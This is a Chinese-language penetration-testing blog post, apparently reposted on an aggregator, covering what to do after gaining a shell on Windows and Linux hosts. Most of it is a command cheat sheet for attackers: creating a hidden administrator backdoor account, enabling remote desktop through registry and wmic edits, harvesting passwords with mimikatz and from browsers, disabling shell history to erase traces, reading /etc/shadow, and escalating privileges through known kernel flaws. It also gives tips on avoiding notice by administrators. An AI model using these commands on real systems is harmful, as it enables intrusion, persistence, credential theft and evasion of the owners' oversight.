获取Shell(提权)后的操作(windows、Linux)
對于Windows系統主機和Linux系統主機,獲取Shell后的操作都不同。
Windows
當我們通過對Web服務器進行滲透,拿到了該Web服務器的shell后,可以執行系統命令后,我們該如何操作呢?
第一步,先?whoami??查看用戶身份,如果是系統用戶那就再好不過了,如果是普通用戶的話,就得想辦法提權了。提權之后,利用mimikatz獲取用戶密碼。如果是域環境的話,還可以獲取登錄過該主機的域用戶密碼。傳送門——>?使用 mimikatz 破解windows登錄密碼
或者我們可以反彈一個MSF類型的shell到kali中,傳送門——>?反彈MSF類型的Shell? ? ,??MSF之后滲透階段
以下命令是在Windows主機滲透測試過程中可以用到的
#信息探測 ipconfig #查看ip等信息 systeminfo #查看系統信息 netstat -ano #查看端口開放信息 tasklist /svc #查看進程信息 net user #查看主機用戶 net localgroup #查看主機組 net share #查看開放的共享 net view #查看內網主機信息#添加用戶后門 net user hack 123 /add #添加用戶并設置密碼 net localgroup administrators hack /add #將用戶加入管理組 net user guest /active:yes #激活guest用戶 net user guest mstlab #更改guest用戶的密碼更多Windows CMD窗口的命令,傳送門——>?Windows常見的cmd命令
如果對方主機沒開3389端口怎么辦?以下命令可以開啟遠程桌面服務,前提是管理員權限。
1.通用開3389(優化后):wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 2.For Win2003:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 3.For Win2008:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 4.For Every:win08,三條命令即可,win2012通用;win7前兩條即可。權限需要administrator。wmic /namespace:\root\cimv2 erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1wmic /namespace:\root\cimv2 erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f創建了后門用戶,開啟了遠程桌面,我們就可以遠程連接了。但是這里要注意,遠程連接前判斷該用戶是否在線,萬一對方管理員在線,你把人家給擠下去了,這樣一下子就暴露了。開啟遠程桌面前慎重,慎重再慎重。
遠程桌面登錄后,我們查看桌面上有哪些軟件,我們要找的目標有以下。
- FTP相關的軟件
- 數據庫相關的軟件
- 打開瀏覽器,查看歷史記錄,查看某些網站是否保存有用戶密碼。利用工具查看瀏覽器保存的密碼
總結:獲得了權限之后,盡一切可能搜集該主機的信息,該主機上各種服務的用戶名和密碼。為接下來的內網滲透弱口令爆破做準備。
Linux
在獲得了Linux主機的權限后。第一步,我們要做的就是讓我們接下來操作的所有命令不在主機上留下任何痕跡。我們可以執行下面的命令,這樣我們接下來執行的所有命令都不會在 .bash_history中看到了。這條命令只對當前終端有效!
export HISTFILE=/dev/null export HISTSIZE=0先查看當前用戶身份,是否是root權限身份,如果不是的話,查看系統版本,是否可以利用已知漏洞提權的,比如 CVE-2016-5195?。?Linux下用SUID提權
然后要做的自然就是維持權限了,傳送門——>??Linux獲取權限
whoami #查看當前用戶身份 uname -a #查看系統信息 history #查看命令歷史,有可能可以查看到管理員的一些重要命令,包括密碼等 last #查看登錄歷史 cat /etc/passwd #查看用戶 cat /etc/shadow #查看密碼?
相關文章:Linux 主機超全滲透測試命令匯總
?
?
總結
以上是生活随笔為你收集整理的获取Shell(提权)后的操作(windows、Linux)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: C/C++socket send函数MS
- 下一篇: C/C++的readdir和readdi